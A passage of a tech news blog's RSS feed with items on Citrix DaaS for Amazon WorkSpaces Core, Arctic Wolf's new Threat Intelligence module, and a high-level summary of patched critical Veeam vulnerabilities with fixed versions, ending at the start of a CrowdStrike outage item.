										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-announces-general-availability-of-citrix-daas-for-amazon-workspaces-core%2F&amp;linkname=Citrix%20Announces%20General%20Availability%20of%20Citrix%20Daas%20for%20Amazon%20WorkSpaces%20Core" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-announces-general-availability-of-citrix-daas-for-amazon-workspaces-core%2F&amp;linkname=Citrix%20Announces%20General%20Availability%20of%20Citrix%20Daas%20for%20Amazon%20WorkSpaces%20Core" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-announces-general-availability-of-citrix-daas-for-amazon-workspaces-core%2F&amp;linkname=Citrix%20Announces%20General%20Availability%20of%20Citrix%20Daas%20for%20Amazon%20WorkSpaces%20Core" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-announces-general-availability-of-citrix-daas-for-amazon-workspaces-core%2F&amp;linkname=Citrix%20Announces%20General%20Availability%20of%20Citrix%20Daas%20for%20Amazon%20WorkSpaces%20Core" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-announces-general-availability-of-citrix-daas-for-amazon-workspaces-core%2F&amp;linkname=Citrix%20Announces%20General%20Availability%20of%20Citrix%20Daas%20for%20Amazon%20WorkSpaces%20Core" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcitrix-announces-general-availability-of-citrix-daas-for-amazon-workspaces-core%2F&amp;linkname=Citrix%20Announces%20General%20Availability%20of%20Citrix%20Daas%20for%20Amazon%20WorkSpaces%20Core" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-large"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='1024'%20height='576'%20viewBox=%270%200%201024%20576%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" decoding="async" width="1024" height="576" data-tf-src="http://www.ervik.as/wp-content/uploads/2022/01/Citrix_logo_wide-scaled-1-1024x576.jpeg" alt="Citrix Announces General Availability of Citrix Daas for Amazon WorkSpaces Core" class="tf_svg_lazy wp-image-14969" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2022/01/Citrix_logo_wide-scaled-1-1024x576.jpeg 1024w, https://www.ervik.as/wp-content/uploads/2022/01/Citrix_logo_wide-scaled-1-300x169.jpeg 300w, https://www.ervik.as/wp-content/uploads/2022/01/Citrix_logo_wide-scaled-1-768x432.jpeg 768w, https://www.ervik.as/wp-content/uploads/2022/01/Citrix_logo_wide-scaled-1-1536x864.jpeg 1536w, https://www.ervik.as/wp-content/uploads/2022/01/Citrix_logo_wide-scaled-1-2048x1152.jpeg 2048w" data-tf-sizes="(max-width: 1024px) 100vw, 1024px" /><noscript><img decoding="async" width="1024" height="576" data-tf-not-load src="http://www.ervik.as/wp-content/uploads/2022/01/Citrix_logo_wide-scaled-1-1024x576.jpeg" alt="Citrix Announces General Availability of Citrix Daas for Amazon WorkSpaces Core" class="wp-image-14969" srcset="https://www.ervik.as/wp-content/uploads/2022/01/Citrix_logo_wide-scaled-1-1024x576.jpeg 1024w, https://www.ervik.as/wp-content/uploads/2022/01/Citrix_logo_wide-scaled-1-300x169.jpeg 300w, https://www.ervik.as/wp-content/uploads/2022/01/Citrix_logo_wide-scaled-1-768x432.jpeg 768w, https://www.ervik.as/wp-content/uploads/2022/01/Citrix_logo_wide-scaled-1-1536x864.jpeg 1536w, https://www.ervik.as/wp-content/uploads/2022/01/Citrix_logo_wide-scaled-1-2048x1152.jpeg 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /></noscript></figure>



<h2 class="wp-block-heading"><a href="https://www.citrix.com/content/citrix/en_us/" target="_blank" rel="noopener">Citrix</a>, a business unit of Cloud Software Group, Inc., announced the general availability of Citrix DaaS<img loading="lazy" decoding="async" width="72" height="72" src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> for Amazon WorkSpaces Core from Amazon Web Services (AWS). This innovative solution leverages the strengths of Citrix DaaS with AWS’s managed virtual desktop infrastructure (VDI) service, Amazon WorkSpaces Core, offering businesses a secure, high-performing, and economically effective way to deliver virtual desktops and applications to users, including support for Microsoft 365 Apps for enterprise, regardless of location or device.</h2>



<p>We’re excited to expand our relationship with AWS through Citrix DaaS for Amazon WorkSpaces Core,” said Sridhar Mullapudi, General Manager of <a href="http://www.ervik.as/citrix">Citrix</a>. “This integration harnesses the power of both platforms, providing our customers with a robust, adaptable, and secure solution for virtual desktop delivery. By working with AWS, we are empowering businesses to streamline IT operations and enhance user experiences across the board.”</p>



<p>With the release of Citrix DaaS for Amazon WorkSpaces Core, organizations can now manage their combined Citrix and Amazon WorkSpaces Core environments more effectively, benefiting from a unified management experience. This solution introduces new capabilities, including flexible compute pricing models, seamless support for Microsoft 365 Apps for enterprise, and enhanced security features such as encrypted disk support.</p>



<p><a></a>“Our relationship with AWS is about driving value for our customers by offering scalable and secure virtual desktop solutions that meet their evolving needs,” said Hector Lima, Chief Revenue Officer for Citrix. “With Citrix DaaS for Amazon WorkSpaces Core, businesses can benefit from a streamlined desktop delivery solution that supports their growth and cloud adoption goal.&#8221;</p>



<p><strong>Key Features and Benefits:</strong></p>



<ul class="wp-block-list">
<li><strong>Fixed Compute Pricing:</strong> Citrix DaaS for Amazon WorkSpaces Core offers a fixed-price model designed to optimize IT budgets. Additionally, organizations can take advantage of discounts with the AWS Enterprise Discount Program (EDP) when utilizing the full suite of Citrix and AWS offerings. Citrix customers with Universal Hybrid Multi-Cloud (UHMC) or Citrix Platform License (CPL) can take full advantage of deployments on Amazon WorkSpaces Core as a part of their Citrix<sup>Ⓡ</sup> product entitlements.</li>



<li><strong>Productivity App Integration:</strong> The solution supports Microsoft 365 Apps for enterprise, as well as Windows Server and Windows Desktop operating systems on dedicated instances. Businesses already using these systems can deploy their applications on Amazon WorkSpaces Core, at no additional cost depending on their existing licenses. This integration ensures secure and efficient application delivery across all devices, maximizing the value of existing IT investments.</li>



<li><strong>Automation with Terraform:</strong> For customers favoring infrastructure-as-code, the Citrix<sup>Ⓡ </sup>Terraform Provider allows for automated deployments, creating necessary resources through Citrix DaaS APIs. This enables efficient scaling and management of virtual desktop environments.</li>



<li><strong>Support for Single Session and Encrypted Disks:</strong> Citrix DaaS for Amazon WorkSpaces Core provides support for Windows Server 2019 and 2022 single session instances and adds encrypted disk support, providing greater flexibility and an extra layer of security for deployments.</li>
</ul>



<p>&#8220;Citrix DaaS for Amazon WorkSpaces Core sets a new standard for our customers in delivering secure, consistent virtual desktop access, no matter where their users are,” said Alex Duncan, VP Digital Workspace at Presidio, a Citrix Platinum Partner. &#8220;The solution helps IT teams deploy Office 365 apps in AWS and achieve greater efficiency and control over resources, while strengthening the overall user experience over the native AWS Workspaces solution.”&nbsp;</p>



<p>Learn more about how Citrix DaaS for Amazon WorkSpaces Core can help transform your virtual desktop delivery by visiting our&nbsp;<a href="https://www.citrix.com/global-partners/amazon-web-services/citrix-workspace-on-aws.html" target="_blank" rel="noopener">page</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>New Threat Intelligence Module launched in the Arctic Wolf Aurora Platform</title>
		<link>https://www.ervik.as/new-threat-intelligence-module-launched-in-the-arctic-wolf-aurora-platform/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Fri, 22 Nov 2024 16:11:35 +0000</pubDate>
				<category><![CDATA[Arctic Wolf]]></category>
		<category><![CDATA[AI]]></category>
		<category><![CDATA[Aurora Platform]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud Security]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[IoCs]]></category>
		<category><![CDATA[MDR]]></category>
		<category><![CDATA[soc]]></category>
		<category><![CDATA[Threat Intelligence]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=32869</guid>

					<description><![CDATA[Arctic Wolf®, a global leader in security operations, has announced the expansion of the&#160;Arctic Wolf AuroraTM&#160;Platform&#160;with the addition of Arctic Wolf Threat Intelligence, a new module that allows organizations to stay ahead of threats by gaining access to real-time threat intelligence and curated reporting. With the launch of Arctic Wolf Threat Intelligence, the Arctic Wolf [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Fnew-threat-intelligence-module-launched-in-the-arctic-wolf-aurora-platform%2F&amp;linkname=New%20Threat%20Intelligence%20Module%20launched%20in%20the%20Arctic%20Wolf%20Aurora%20Platform" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Fnew-threat-intelligence-module-launched-in-the-arctic-wolf-aurora-platform%2F&amp;linkname=New%20Threat%20Intelligence%20Module%20launched%20in%20the%20Arctic%20Wolf%20Aurora%20Platform" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Fnew-threat-intelligence-module-launched-in-the-arctic-wolf-aurora-platform%2F&amp;linkname=New%20Threat%20Intelligence%20Module%20launched%20in%20the%20Arctic%20Wolf%20Aurora%20Platform" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Fnew-threat-intelligence-module-launched-in-the-arctic-wolf-aurora-platform%2F&amp;linkname=New%20Threat%20Intelligence%20Module%20launched%20in%20the%20Arctic%20Wolf%20Aurora%20Platform" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Fnew-threat-intelligence-module-launched-in-the-arctic-wolf-aurora-platform%2F&amp;linkname=New%20Threat%20Intelligence%20Module%20launched%20in%20the%20Arctic%20Wolf%20Aurora%20Platform" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Fnew-threat-intelligence-module-launched-in-the-arctic-wolf-aurora-platform%2F&amp;linkname=New%20Threat%20Intelligence%20Module%20launched%20in%20the%20Arctic%20Wolf%20Aurora%20Platform" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-full is-resized"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='1024'%20height='1024'%20viewBox=%270%200%201024%201024%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" decoding="async" width="1024" height="1024" data-tf-src="https://www.ervik.as/wp-content/uploads/2024/11/Arctic-Wolf-Threat-Intelligence-3.webp" alt="New Threat Intelligence Module launched in the Arctic Wolf Aurora Platform" class="tf_svg_lazy wp-image-32872" style="background:linear-gradient(to right,#d7eae6 25%,#bae5e7 25% 50%,#1c3c5a 50% 75%,#638396 75%),linear-gradient(to right,#1f3051 25%,#75deed 25% 50%,#f1fff4 50% 75%,#206378 75%),linear-gradient(to right,#a1ada9 25%,#368da2 25% 50%,#546c6f 50% 75%,#85a6ad 75%),linear-gradient(to right,#547ea0 25%,#dee2cc 25% 50%,#677a71 50% 75%,#a5c5d1 75%);width:615px;height:auto" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2024/11/Arctic-Wolf-Threat-Intelligence-3.webp 1024w, https://www.ervik.as/wp-content/uploads/2024/11/Arctic-Wolf-Threat-Intelligence-3-300x300.webp 300w, https://www.ervik.as/wp-content/uploads/2024/11/Arctic-Wolf-Threat-Intelligence-3-150x150.webp 150w, https://www.ervik.as/wp-content/uploads/2024/11/Arctic-Wolf-Threat-Intelligence-3-768x768.webp 768w" data-tf-sizes="(max-width: 1024px) 100vw, 1024px" /><noscript><img decoding="async" width="1024" height="1024" data-tf-not-load src="https://www.ervik.as/wp-content/uploads/2024/11/Arctic-Wolf-Threat-Intelligence-3.webp" alt="New Threat Intelligence Module launched in the Arctic Wolf Aurora Platform" class="wp-image-32872" style="width:615px;height:auto" srcset="https://www.ervik.as/wp-content/uploads/2024/11/Arctic-Wolf-Threat-Intelligence-3.webp 1024w, https://www.ervik.as/wp-content/uploads/2024/11/Arctic-Wolf-Threat-Intelligence-3-300x300.webp 300w, https://www.ervik.as/wp-content/uploads/2024/11/Arctic-Wolf-Threat-Intelligence-3-150x150.webp 150w, https://www.ervik.as/wp-content/uploads/2024/11/Arctic-Wolf-Threat-Intelligence-3-768x768.webp 768w" sizes="(max-width: 1024px) 100vw, 1024px" /></noscript></figure>



<h2 class="wp-block-heading">Arctic Wolf®, a global leader in security operations, has announced the expansion of the&nbsp;<a href="https://arcticwolf.com/security-operations-platform/" target="_blank" rel="noopener">Arctic Wolf Aurora<sup>TM</sup>&nbsp;Platform</a>&nbsp;with the addition of Arctic Wolf Threat Intelligence, a new module that allows organizations to stay ahead of threats by gaining access to real-time threat intelligence and curated reporting.</h2>



<p>With the launch of <a href="https://www.ervik.as/soc/arctic-wolf/">Arctic Wolf </a>Threat Intelligence, the Arctic Wolf Aurora Platform continues to redefine what having effective security operations means for organizations today. In an environment where cyber risk is synonymous with business risk, companies need a cybersecurity platform that not only keeps pace with threats but actively reduces risk and builds long-term resilience. </p>



<p>The Arctic Wolf Aurora Platform, powered by Alpha AI<sup>TM</sup>, makes security work by using advanced AI and machine learning algorithms to deliver scalable and automated threat detection, response, and remediation capabilities. When combined with Arctic Wolf’s Concierge Delivery Model and Security Journey, organizations can achieve critical security outcomes—that drive down cyber risk, empowering them to focus on success and innovation for their business.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>“The Arctic Wolf Aurora Platform and Alpha AI stand out in the industry for their unparalleled power and scale, processing over seven trillion events each week to deliver the unique insights on the threat landscape that are exclusive to Arctic Wolf,”. </p>



<p>“Arctic Wolf Threat Intelligence doesn’t just deliver raw data; it transforms vast, complex sets of information into actionable, prioritized insights that are uniquely collected from the more than 6, 200 customers that Arctic Wolf protects each day. By giving organizations access to the same intelligence trusted by Arctic Wolf, we can now empower security teams around the world to better anticipate, adapt, and respond to the rapidly evolving tactics of modern threat actors.”  <br><strong>said Dan Schiappa, chief product and services officer, Arctic Wolf.</strong></p>
</blockquote>



<p>With the volume and complexity of cyber threats continuously increasing, organizations are struggling to stay ahead of threat actors who are constantly developing new and novel attack methods. To meet this challenge head on, security teams require more than generic threat feeds—they need prioritized threat intelligence insights that allow them to address the most pressing risks in an efficient and scalable way.</p>



<p>Arctic Wolf Threat Intelligence enables organizations to gain access to the same threat intelligence that powers the Arctic Wolf security operations center (SOC), one of the largest commercial SOCs in the world. Drawing from the Arctic Wolf Aurora Platform’s immense dataset that includes over 500,000 daily malware samples and more than 125,000 monthly SOC investigations that span virtually all threat surfaces, industries, geographies, and organizational sizes, Arctic Wolf Threat Intelligence offers security teams a powerful combination of curated intelligence reporting and real-time threat feeds.</p>



<p>Key feature of Arctic Wolf Threat Intelligence include:</p>



<ul class="wp-block-list">
<li><strong>Threat Pulse:</strong>&nbsp;Curated monthly and quarterly insights into active threat campaigns and essential Indicators of Compromise (IoCs) through easy-to-consume written reports and video highlights.</li>



<li><strong>Intelligence Feeds:</strong>&nbsp;IoC lists-including IPs, domains, URLs, and file hashes-designed for seamless integration into firewall and endpoint block/allow lists.</li>



<li><strong>IOC QuickLinks:</strong>&nbsp;Search an organization’s environment for IOCs using Arctic Wolf Data Explorer, simplifying and accelerating threat validation with a single click.</li>
</ul>



<p>To learn more about the Arctic Wolf Aurora Platform and Arctic Wolf Threat Intelligence, visit&nbsp;<a href="http://arcticwolf.com/" target="_blank" rel="noopener">arcticwolf.com</a>.</p>



<p><strong>Additional Resources:</strong> Visit&nbsp;<a href="https://www.arcticwolf.com/" target="_blank" rel="noopener">arcticwolf.com</a>&nbsp;to learn more about&nbsp;our&nbsp;<a href="https://arcticwolf.com/solutions/" target="_blank" rel="noopener">security operations solutions</a></p>



<p><strong>About Arctic Wolf:</strong><br>Arctic Wolf® is a global leader in security operations, enabling customers to manage their cyber risk in the face of modern cyber-attacks via a premier cloud-native security operations platform. The Arctic Wolf Security Operations Cloud ingests and analyzes more than seven trillion security events a week to help enable cyber defense at an unprecedented capacity and scale, empowering customers of virtually any size across a wide range of industries to feel confident in their security posture, readiness, and long-term resilience. By delivering automated threat protection, response, and remediation capabilities, Arctic Wolf delivers world-class security operations with the push of a button so customers can defend their greatest assets at the speed of data.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Critical Vulnerabilities Patched in Veeam Products</title>
		<link>https://www.ervik.as/critical-vulnerabilities-patched-in-veeam-products/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Sat, 07 Sep 2024 08:11:43 +0000</pubDate>
				<category><![CDATA[Veeam Software]]></category>
		<category><![CDATA[CVE]]></category>
		<category><![CDATA[patch]]></category>
		<category><![CDATA[Veeam]]></category>
		<category><![CDATA[Vulnerabilities]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=30614</guid>

					<description><![CDATA[On September 4, 2024, Veeam released a security bulletin announcing that they have fixed several vulnerabilities affecting various Veeam products. Arctic Wolf has highlighted five of these vulnerabilities, which are classified as critical.&#160; Vulnerability&#160; CVSS&#160; Affected Product&#160; Description&#160; CVE-2024-40711&#160; 9.8&#160; Veeam Backup and Replication&#160; Enables an unauthenticated attacker to achieve remote code execution (RCE).&#160; CVE-2024-42024&#160; [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcritical-vulnerabilities-patched-in-veeam-products%2F&amp;linkname=Critical%20Vulnerabilities%20Patched%20in%20Veeam%20Products" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcritical-vulnerabilities-patched-in-veeam-products%2F&amp;linkname=Critical%20Vulnerabilities%20Patched%20in%20Veeam%20Products" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcritical-vulnerabilities-patched-in-veeam-products%2F&amp;linkname=Critical%20Vulnerabilities%20Patched%20in%20Veeam%20Products" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcritical-vulnerabilities-patched-in-veeam-products%2F&amp;linkname=Critical%20Vulnerabilities%20Patched%20in%20Veeam%20Products" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcritical-vulnerabilities-patched-in-veeam-products%2F&amp;linkname=Critical%20Vulnerabilities%20Patched%20in%20Veeam%20Products" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcritical-vulnerabilities-patched-in-veeam-products%2F&amp;linkname=Critical%20Vulnerabilities%20Patched%20in%20Veeam%20Products" title="Email" rel="nofollow noopener" target="_blank"></a></p>
<figure class="wp-block-image size-large"><img src="data:image/svg+xml,%3Csvg%20xmlns=%27http://www.w3.org/2000/svg%27%20width='1024'%20height='300'%20viewBox=%270%200%201024%20300%27%3E%3C/svg%3E" loading="lazy" data-lazy="1" style="background:linear-gradient(to right,#fcb316 25%,#fcb316 25% 50%,#fcb316 50% 75%,#fcb316 75%),linear-gradient(to right,#000000 25%,#faa820 25% 50%,#faa820 50% 75%,#000000 75%),linear-gradient(to right,#000000 25%,#000000 25% 50%,#000000 50% 75%,#000000 75%),linear-gradient(to right,#fe7a0e 25%,#000000 25% 50%,#000000 50% 75%,#fe7a0e 75%)" decoding="async" width="1024" height="300" data-tf-src="https://www.ervik.as/wp-content/uploads/2024/09/cve-1024x300.png" alt="CVE Critical Vulnerabilities Patched in Veeam Products" class="tf_svg_lazy wp-image-30615" data-tf-srcset="https://www.ervik.as/wp-content/uploads/2024/09/cve-1024x300.png 1024w, https://www.ervik.as/wp-content/uploads/2024/09/cve-300x88.png 300w, https://www.ervik.as/wp-content/uploads/2024/09/cve-768x225.png 768w, https://www.ervik.as/wp-content/uploads/2024/09/cve.png 1337w" data-tf-sizes="(max-width: 1024px) 100vw, 1024px" /><noscript><img decoding="async" width="1024" height="300" data-tf-not-load src="https://www.ervik.as/wp-content/uploads/2024/09/cve-1024x300.png" alt="CVE Critical Vulnerabilities Patched in Veeam Products" class="wp-image-30615" srcset="https://www.ervik.as/wp-content/uploads/2024/09/cve-1024x300.png 1024w, https://www.ervik.as/wp-content/uploads/2024/09/cve-300x88.png 300w, https://www.ervik.as/wp-content/uploads/2024/09/cve-768x225.png 768w, https://www.ervik.as/wp-content/uploads/2024/09/cve.png 1337w" sizes="(max-width: 1024px) 100vw, 1024px" /></noscript></figure>



<p>On September 4, 2024, Veeam released a security bulletin announcing that they have fixed several vulnerabilities affecting various Veeam products. Arctic Wolf has highlighted five of these vulnerabilities, which are classified as critical.&nbsp;</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td><strong>Vulnerability</strong>&nbsp;</td><td><strong>CVSS</strong>&nbsp;</td><td><strong>Affected Product</strong>&nbsp;</td><td><strong>Description</strong>&nbsp;</td></tr><tr><td>CVE-2024-40711&nbsp;</td><td>9.8&nbsp;</td><td>Veeam Backup and Replication&nbsp;</td><td>Enables an unauthenticated attacker to achieve remote code execution (RCE).&nbsp;</td></tr><tr><td>CVE-2024-42024&nbsp;</td><td>9.1&nbsp;</td><td>Veeam ONE&nbsp;</td><td>Allows an attacker with Veeam ONE Agent service account credentials to achieve RCE on the machine where the Veeam ONE Agent is installed.&nbsp;</td></tr><tr><td>CVE-2024-42019&nbsp;</td><td>9.0&nbsp;</td><td>Veeam ONE&nbsp;</td><td>An attacker can exploit this vulnerability to obtain the NTLM hash of the Veeam Reporter Service account, but it requires user interaction and data from Veeam Backup &amp; Replication.&nbsp;</td></tr><tr><td>CVE-2024-38650&nbsp;</td><td>9.9&nbsp;</td><td>Veeam Service Provider Console&nbsp;</td><td>A vulnerability that allows access to the NTLM hash of a service account on the VSPC server by a low-privileged attacker.&nbsp;</td></tr><tr><td>CVE-2024-39714&nbsp;</td><td>9.9&nbsp;</td><td>Veeam Service Provider Console&nbsp;</td><td>Enables RCE on the VSPC server by permitting a low-privileged user to upload arbitrary files to the server.&nbsp;</td></tr></tbody></table></figure>



<p>Arctic Wolf has not observed any exploitation of these vulnerabilities in the wild and has not identified any publicly available proof of concept (PoC) exploit code. Veeam Backup &amp; Replication, in particular, has been a frequent target for ransomware groups due to its critical role in backup and recovery. Given this historical targeting, threat actors may try to reverse engineer the patches and develop exploits to take advantage of these vulnerabilities in the near future.&nbsp;</p>



<h2 class="wp-block-heading">Recommendation&nbsp;</h2>



<h3 class="wp-block-heading">Upgrade to Latest Fixed Version</h3>



<p>Arctic Wolf strongly recommends that customers upgrade to the latest fixed version.&nbsp;</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td><strong>Product</strong>&nbsp;</td><td><strong>Affected Version</strong>&nbsp;</td><td><strong>Fixed Version</strong>&nbsp;</td></tr><tr><td>Veeam Backup and Replication&nbsp;</td><td>12.1.2.172 and all&nbsp;<a href="https://www.veeam.com/kb2680" target="_blank" rel="noreferrer noopener">earlier version 12 builds</a>.&nbsp;&nbsp;</td><td><a href="https://www.veeam.com/kb4600" target="_blank" rel="noreferrer noopener">12.2 (build 12.2.0.334)</a>&nbsp;</td></tr><tr><td>Veeam ONE&nbsp;</td><td>12.1.0.3208 and&nbsp;<a href="https://www.veeam.com/kb4357" target="_blank" rel="noreferrer noopener">all earlier version 12 builds</a>&nbsp;</td><td><a href="https://www.veeam.com/kb4357" target="_blank" rel="noreferrer noopener">v12.2 (build 12.2.0.4093)</a>&nbsp;</td></tr><tr><td>Veeam Service Provider Console&nbsp;</td><td>8.0.0.19552 and all&nbsp;<a href="https://www.veeam.com/kb4464" target="_blank" rel="noreferrer noopener">earlier version 8 builds</a>.&nbsp;</td><td><a href="https://www.veeam.com/kb4464" target="_blank" rel="noreferrer noopener">v8.1 (build 8.1.0.21377)</a>&nbsp;</td></tr></tbody></table></figure>



<p>Please follow your organization’s patching and testing guidelines to avoid any operational impact.&nbsp;</p>



<h4 class="wp-block-heading"><strong>References</strong>&nbsp;</h4>



<ul class="wp-block-list">
<li><a href="https://www.veeam.com/kb4649" target="_blank" rel="noreferrer noopener">Veeam Security Bulletin</a></li>
</ul>



<p><em>Stay up to date with the&nbsp;<a href="https://arcticwolf.com/resources/tag/security-bulletins/" target="_blank" rel="noopener">latest security incidents and trends</a>&nbsp;from Arctic Wolf Labs.&nbsp;</em></p>



<p><em>Explore the latest global threats with the&nbsp;<a href="https://arcticwolf.com/resource/aw/arctic-wolf-labs-2024-threat-report?lb-mode=overlay" target="_blank" rel="noopener">2024 Arctic Wolf Labs Threats Report</a>.&nbsp;</em></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Crowdstrike update causes major issues around the world</title>
		<link>https://www.ervik.as/crowdstrike-update-causes-major-issues-around-the-whole-world/</link>
		
		<dc:creator><![CDATA[Alexander Ervik Johnsen]]></dc:creator>
		<pubDate>Fri, 19 Jul 2024 09:55:12 +0000</pubDate>
				<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[Cyber Security News]]></category>
		<category><![CDATA[BSOD]]></category>
		<category><![CDATA[CrowdStrike]]></category>
		<category><![CDATA[CrowdStrike Bug]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">https://www.ervik.as/?p=28685</guid>

					<description><![CDATA[CrowdStrike Update Pushing Windows Machines Into a BSOD Loop. Crowdstrike, a cybersecurity technology company that provides endpoint security, threat assessment and cyberattack response services, served up a very unfortunate update to Microsoft&#8217;s Windows 10 and 11 ecosystem. A recent update to the company´s Falcon sensor is causing major issues for Microsoft Windows users worldwide. This [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcrowdstrike-update-causes-major-issues-around-the-whole-world%2F&amp;linkname=Crowdstrike%20update%20causes%20major%20issues%20around%20the%20world" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_bluesky" href="https://www.addtoany.com/add_to/bluesky?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcrowdstrike-update-causes-major-issues-around-the-whole-world%2F&amp;linkname=Crowdstrike%20update%20causes%20major%20issues%20around%20the%20world" title="Bluesky" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcrowdstrike-update-causes-major-issues-around-the-whole-world%2F&amp;linkname=Crowdstrike%20update%20causes%20major%20issues%20around%20the%20world" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcrowdstrike-update-causes-major-issues-around-the-whole-world%2F&amp;linkname=Crowdstrike%20update%20causes%20major%20issues%20around%20the%20world" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcrowdstrike-update-causes-major-issues-around-the-whole-world%2F&amp;linkname=Crowdstrike%20update%20causes%20major%20issues%20around%20the%20world" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fwww.ervik.as%2Fcrowdstrike-update-causes-major-issues-around-the-whole-world%2F&amp;linkname=Crowdstrike%20update%20causes%20major%20issues%20around%20the%20world" title="Email" rel="nofollow noopener" target="_blank"></a></p>
